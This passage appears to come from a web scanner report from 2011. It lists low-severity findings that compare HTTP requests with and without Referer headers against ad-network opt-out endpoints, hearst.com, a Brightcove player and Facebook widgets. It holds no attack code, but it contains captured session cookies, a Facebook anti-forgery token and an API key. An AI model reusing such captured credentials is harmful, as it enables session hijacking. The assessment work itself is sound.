User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OO=OptOut

Response 1

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Location: http://www.networkadvertising.org/verify/cookie_optout.gif
Content-Length: 0
Date: Sat, 17 Sep 2011 16:45:13 GMT

Request 2

GET /ads/opt-out?op=check&src=NAI&j=&nocache=0.7159083 HTTP/1.1
Host: ads.amgdgt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OO=OptOut

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Location: http://www.networkadvertising.org/optout/opt_failure.gif
Content-Length: 0
Date: Sat, 17 Sep 2011 16:45:41 GMT

16.5. http://ats.tumri.net/ats/optout  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ats.tumri.net
Path:   /ats/optout

Request 1

GET /ats/optout?nai=true&id=1936234986&nocache=0.4719862 HTTP/1.1
Host: ats.tumri.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp

Response 1

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Expires: Sat Sep 17 17:20:29 UTC 2011
Set-Cookie: t_opt=OPT-OUT; Domain=.tumri.net; Expires=Thu, 05-Oct-2079 20:34:36 GMT; Path=/
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Location: http://ats.tumri.net:80/ats/optoutcheck?nai=true&id=1936234986&nocache=0.4719862&tu=1
Content-Length: 0
Date: Sat, 17 Sep 2011 17:20:28 GMT

Request 2

GET /ats/optout?nai=true&id=1936234986&nocache=0.4719862 HTTP/1.1
Host: ats.tumri.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Location: http://www.tumri.com/privacy/status-failure.jpg
Content-Length: 0
Date: Sat, 17 Sep 2011 17:20:56 GMT

16.6. http://c.brightcove.com/services/viewer/federated_f9  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://c.brightcove.com
Path:   /services/viewer/federated_f9

Request 1

GET /services/viewer/federated_f9?&width=280&height=215&flashID=myExperience&bgcolor=%23FFFFFF&playerID=77771338001&publisherID=4139489001&isVid=true&isUI=true&wmode=transparent&dynamicStreaming=true&autoStart=&debuggerID= HTTP/1.1
Host: c.brightcove.com
Proxy-Connection: keep-alive
Referer: http://www.seventeen.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 302 Moved Temporarily
X-BC-Client-IP: 50.23.123.106
X-BC-Connecting-IP: 50.23.123.106
Last-Modified: Fri, 16 Sep 2011 18:07:17 UTC
Cache-Control: must-revalidate,max-age=0
Location: http://admin.brightcove.com/viewer/us20110916.1045/BrightcoveBootloader.swf?playerID=77771338001&purl=http%3A%2F%2Fwww.seventeen.com%2F&autoStart=&bgcolor=%23FFFFFF&debuggerID=&dynamicStreaming=true&flashID=myExperience&height=215&isUI=true&isVid=true&publisherID=4139489001&width=280&wmode=transparent
Content-Length: 0
Date: Sat, 17 Sep 2011 16:38:00 GMT
Server:

Request 2

GET /services/viewer/federated_f9?&width=280&height=215&flashID=myExperience&bgcolor=%23FFFFFF&playerID=77771338001&publisherID=4139489001&isVid=true&isUI=true&wmode=transparent&dynamicStreaming=true&autoStart=&debuggerID= HTTP/1.1
Host: c.brightcove.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 302 Moved Temporarily
X-BC-Client-IP: 50.23.123.106
X-BC-Connecting-IP: 50.23.123.106
Last-Modified: Fri, 16 Sep 2011 14:04:44 EDT
Cache-Control: must-revalidate,max-age=0
Location: http://admin.brightcove.com/viewer/us20110916.1045/BrightcoveBootloader.swf?playerID=77771338001&autoStart=&bgcolor=%23FFFFFF&debuggerID=&dynamicStreaming=true&flashID=myExperience&height=215&isUI=true&isVid=true&publisherID=4139489001&width=280&wmode=transparent
Content-Length: 0
Date: Sat, 17 Sep 2011 16:38:35 GMT
Server:

16.7. http://hearst.com/images/icon-pointer-roll.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://hearst.com
Path:   /images/icon-pointer-roll.gif

Request 1

GET /images/icon-pointer-roll.gif HTTP/1.1
Host: hearst.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:22:44 GMT
Server: Apache/2.2.3 (Linux/SUSE)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1163

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
<p>


The requested URL was not found on this server.


The link on the
<a href="http://hearst.com/">referring
page</a> seems to be wrong or outdated. Please inform the author of
<a href="http://hearst.com/">that page</a>
about the error.



</p>
<p>
If you think this is a server error, please contact
the <a href="mailto:%5bno%20address%20given%5d">webmaster</a>.

</p>

<h2>Error 404</h2>
<address>
<a href="/">hearst.com</a><br />

<span>Sat Sep 17 12:22:44 2011<br />
Apache/2.2.3 (Linux/SUSE)</span>
</address>
</body>
</html>

Request 2

GET /images/icon-pointer-roll.gif HTTP/1.1
Host: hearst.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:22:46 GMT
Server: Apache/2.2.3 (Linux/SUSE)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1042

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
<p>


The requested URL was not found on this server.


If you entered the URL manually please check your
spelling and try again.



</p>
<p>
If you think this is a server error, please contact
the <a href="mailto:%5bno%20address%20given%5d">webmaster</a>.

</p>

<h2>Error 404</h2>
<address>
<a href="/">hearst.com</a><br />

<span>Sat Sep 17 12:22:46 2011<br />
Apache/2.2.3 (Linux/SUSE)</span>
</address>
</body>
</html>

16.8. http://hearst.com/images/icon-pointer.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://hearst.com
Path:   /images/icon-pointer.gif

Request 1

GET /images/icon-pointer.gif HTTP/1.1
Host: hearst.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:22:36 GMT
Server: Apache/2.2.3 (Linux/SUSE)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1163

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
<p>


The requested URL was not found on this server.


The link on the
<a href="http://hearst.com/">referring
page</a> seems to be wrong or outdated. Please inform the author of
<a href="http://hearst.com/">that page</a>
about the error.



</p>
<p>
If you think this is a server error, please contact
the <a href="mailto:%5bno%20address%20given%5d">webmaster</a>.

</p>

<h2>Error 404</h2>
<address>
<a href="/">hearst.com</a><br />

<span>Sat Sep 17 12:22:36 2011<br />
Apache/2.2.3 (Linux/SUSE)</span>
</address>
</body>
</html>

Request 2

GET /images/icon-pointer.gif HTTP/1.1
Host: hearst.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:22:38 GMT
Server: Apache/2.2.3 (Linux/SUSE)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1042

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
<p>


The requested URL was not found on this server.


If you entered the URL manually please check your
spelling and try again.



</p>
<p>
If you think this is a server error, please contact
the <a href="mailto:%5bno%20address%20given%5d">webmaster</a>.

</p>

<h2>Error 404</h2>
<address>
<a href="/">hearst.com</a><br />

<span>Sat Sep 17 12:22:38 2011<br />
Apache/2.2.3 (Linux/SUSE)</span>
</address>
</body>
</html>

16.9. http://optout.collective-media.net/optout/status  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://optout.collective-media.net
Path:   /optout/status

Request 1

GET /optout/status?nocache=0.4956455 HTTP/1.1
Host: optout.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E

Response 1

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.8.53
Date: Sat, 17 Sep 2011 16:43:39 GMT
Content-Type: text/html
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Location: http://www.networkadvertising.org/verify/cookie_optout.gif
Content-Length: 0

Request 2

GET /optout/status?nocache=0.4956455 HTTP/1.1
Host: optout.collective-media.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E

Response 2

HTTP/1.0 403 Forbidden
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html><body><h1>403 Forbidden</h1>
Request forbidden by administrative rules.
</body></html>
16.10. http://pixel.adsafeprotected.com/jspix  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Request 1

GET /jspix?anId=144&pubId=24537&campId=176617 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686642?t=1316294694453&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fseattlepicom.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=53B5F23AB36BD79521AB4E652A929124; Path=/
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 16:23:45 GMT
Connection: close


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686642?t=1316294694453&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fseattlepicom.php",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=144&pubId=24537&campId=176617",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   killPhrases : "",
   asid : "gt764n94"
};


(function(){var O="3.13.1";var w=(adsafeVisParams.debug==="true");var o=2000;var I={INFO:"info",LOG:"log",DIR:"dir"};var k=function(W,Y,U){if(typeof Y==="undefined"){Y=I.INFO;}if(w&&(typeof console!=="undefined")&&(typeof console.info!=="undefined")&&(typeof console.log!=="undefined")){if(typeof console.dir==="undefined"&&Y===I.DIR){if(typeof W==="object"){for(var X in W){if(W.hasOwnProperty(X)){var S=(typeof U!=="undefined")?U+" : ":"";k(W[X],Y,S+X);}}}else{try{console.log(U+": "+W);}catch(V){}}}else{try{console[Y](W);}catch(T){}}}};var A=window!=top;var y=false;var g=new Date().getTime();var q=function(U,T){var S,X,W;var V="Detection Results:\n\n";for(S in U){W=U[S];V+=W.key+": "+decodeURIComponent(W.val)+"\n";}k(V);V="key: \n";for(X in T){if(T.hasOwnProperty(X)){V+=X+": "+T[X]+"\n";}}k(V);};k("v"+O+", mode: "+adsafeVisParams.mode);k("Server Parameters:");k(adsafeVisParams,I.DIR);var c={a:"top.location.href",b:"parent.location.href",c:"parent.document.referrer",d:"window.location.href",e:"window.document.referrer",f:"jsref",g:"ffCheck -- firefox result",q:"ffCheck -- parent.parent.parent... result"};var M=function(){var S={};try{S.a=encodeURIComponent(top.location.href);}catch(V){}try{S.b=encodeURIComponent(parent.location.href);}catch(V){}if(A){try{S.c=encodeURIComponent(parent.document.referrer);}catch(V){}try{S.e=encodeURIComponent(window.document.referrer);}catch(V){}}try{S.d=encodeURIComponent(window.location.href);}catch(V){}try{S.f=encodeURIComponent(adsafeVisParams.jsref);}catch(V){}try{var U=h();S.g=encodeUR
...[SNIP]...

Request 2

GET /jspix?anId=144&pubId=24537&campId=176617 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=D7B5BE89DE1E27C1DF0DCFE044BAA7B9; Path=/
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 16:23:46 GMT
Connection: close


var adsafeVisParams = {
   mode : "jspix",
   jsref : "null",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=144&pubId=24537&campId=176617",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   killPhrases : "",
   asid : "gt764np9"
};


(function(){var O="3.13.1";var w=(adsafeVisParams.debug==="true");var o=2000;var I={INFO:"info",LOG:"log",DIR:"dir"};var k=function(W,Y,U){if(typeof Y==="undefined"){Y=I.INFO;}if(w&&(typeof console!=="undefined")&&(typeof console.info!=="undefined")&&(typeof console.log!=="undefined")){if(typeof console.dir==="undefined"&&Y===I.DIR){if(typeof W==="object"){for(var X in W){if(W.hasOwnProperty(X)){var S=(typeof U!=="undefined")?U+" : ":"";k(W[X],Y,S+X);}}}else{try{console.log(U+": "+W);}catch(V){}}}else{try{console[Y](W);}catch(T){}}}};var A=window!=top;var y=false;var g=new Date().getTime();var q=function(U,T){var S,X,W;var V="Detection Results:\n\n";for(S in U){W=U[S];V+=W.key+": "+decodeURIComponent(W.val)+"\n";}k(V);V="key: \n";for(X in T){if(T.hasOwnProperty(X)){V+=X+": "+T[X]+"\n";}}k(V);};k("v"+O+", mode: "+adsafeVisParams.mode);k("Server Parameters:");k(adsafeVisParams,I.DIR);var c={a:"top.location.href",b:"parent.location.href",c:"parent.document.referrer",d:"window.location.href",e:"window.document.referrer",f:"jsref",g:"ffCheck -- firefox result",q:"ffCheck -- parent.parent.parent... result"};var M=function(){var S={};try{S.a=encodeURIComponent(top.location.href);}catch(V){}try{S.b=encodeURIComponent(parent.location.href);}catch(V){}if(A){try{S.c=encodeURIComponent(parent.document.referrer);}catch(V){}try{S.e=encodeURIComponent(window.document.referrer);}catch(V){}}try{S.d=encodeURIComponent(window.location.href);}catch(V){}try{S.f=encodeURIComponent(adsafeVisParams.jsref);}catch(V){}try{var U=h();S.g=encodeURIComponent(U.g);S.q=encodeURIComponent(U.q);}catch(V){}S=D(S);S=p(S);var T=[];for(var W in S){if(S.hasOwnProperty(W)){T.push({key:W,val:S[W]});}}T.sort(function(Y,X){return(Y.val.length>X.val.length)?1:(Y
...[SNIP]...
16.11. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Request 1

GET /extern/login_status.php?api_key=6606a44d10f0b87a63e3258379b62940&extern=0&channel=http%3A%2F%2Fwww.ugo.com%2Fxd_receiver.htm&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response 1

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.36.104
X-Cnection: close
Date: Sat, 17 Sep 2011 16:40:37 GMT
Content-Length: 1074

<script>document.domain = "facebook.com";</script><script src="http://static.ak.connect.facebook.com/connect.php/en_US"></script><script>
var config = {"base_domain":"ugo.com","channel":"http:\/\/www.ugo.com\/xd_receiver.htm","connect_state":2,"debug":false,"granted_perms":null,"in_facebook":true,"locale":"en_US","origin":null,"public_session_data":null,"referer_url":"http:\/\/www.ugo.com\/","session":null,"https":false};
FB.Bootstrap._requireFeatures(["Connect"], function() {
if (config.debug) {
FB.FBDebug.isEnabled = true;
FB.FBDebug.logLevel = 6;
}
FB.XdComm.Server.init("/xd_receiver_v0.4.php");
new FBIntern.LoginStatus().initialize(
config.channel,
config.session,
{ inFacebook: config.in_facebook, locale: config.locale },
config.connect_state,
config.base_domain,
config.public_session_data,
config.referer_url,
config.origin,
config.granted_perms,
config.https
);
});
</script>

Request 2

GET /extern/login_status.php?api_key=6606a44d10f0b87a63e3258379b62940&extern=0&channel=http%3A%2F%2Fwww.ugo.com%2Fxd_receiver.htm&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.15.114
X-Cnection: close
Date: Sat, 17 Sep 2011 16:41:02 GMT
Content-Length: 1054

<script>document.domain = "facebook.com";</script><script src="http://static.ak.connect.facebook.com/connect.php/en_US"></script><script>
var config = {"base_domain":"ugo.com","channel":"http:\/\/www.ugo.com\/xd_receiver.htm","connect_state":2,"debug":false,"granted_perms":null,"in_facebook":true,"locale":"en_US","origin":null,"public_session_data":null,"referer_url":null,"session":null,"https":false};
FB.Bootstrap._requireFeatures(["Connect"], function() {
if (config.debug) {
FB.FBDebug.isEnabled = true;
FB.FBDebug.logLevel = 6;
}
FB.XdComm.Server.init("/xd_receiver_v0.4.php");
new FBIntern.LoginStatus().initialize(
config.channel,
config.session,
{ inFacebook: config.in_facebook, locale: config.locale },
config.connect_state,
config.base_domain,
config.public_session_data,
config.referer_url,
config.origin,
config.granted_perms,
config.https
);
});
</script>
16.12. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/like.php

Request 1

GET /plugins/like.php?href=www.localedge.com&layout=button_count&show_faces=false&width=450&action=like&font=arial&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.localedge.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.214.49
X-Cnection: close
Date: Sat, 17 Sep 2011 16:26:32 GMT
Content-Length: 23331

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
<div id="connect_widget_4e74ca38b40054374611123" class="connect_widget button_count" style="font-family: &quot;arial&quot;, sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center connect_widget_confirm_cell"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up hidden_elem"></div></td><td><div class="undo hidden_elem"></div></td></tr><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">337</div></td></tr></tbody></table></td><td class="connect_widget_button_count_excluding"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">336</div></td></tr></tbody></table></td></tr></table></div></div><script type="text/javascript">
Env={module:"like_widget",impid:"26899f04",fb_dtsg:"AQDoYYJd",no_cookies:1,lhsh:"wAQAMcAOO"};
</script>
<script>



onloadRegister(function (){Bootloader.done([])});
onloadRegister(function (){(function() { new ExternalPageLikeWidget({"viewer":0,"channelURL":"","mobile":false,"nodeType":"page","externalURL":"http:\/\/www.localedge.com\/","pageId":null,"widgetID":"connect_widget_4e74ca38b40054374611123","alreadyConnected":false,"viewerIsAdmin":false,"adminUrl":"","showFaces":false,"useUnlikeLink":false,"layout":"button_count","locale":"en_US","commentWidgetMarkup":"","error":null,"autoResize":true,"connectText":0
...[SNIP]...

Request 2

GET /plugins/like.php?href=www.localedge.com&layout=button_count&show_faces=false&width=450&action=like&font=arial&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.236.47
X-Cnection: close
Date: Sat, 17 Sep 2011 16:26:42 GMT
Content-Length: 23305

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
<div id="connect_widget_4e74ca42303d73153797759" class="connect_widget button_count" style="font-family: &quot;arial&quot;, sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center connect_widget_confirm_cell"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up hidden_elem"></div></td><td><div class="undo hidden_elem"></div></td></tr><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">337</div></td></tr></tbody></table></td><td class="connect_widget_button_count_excluding"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div 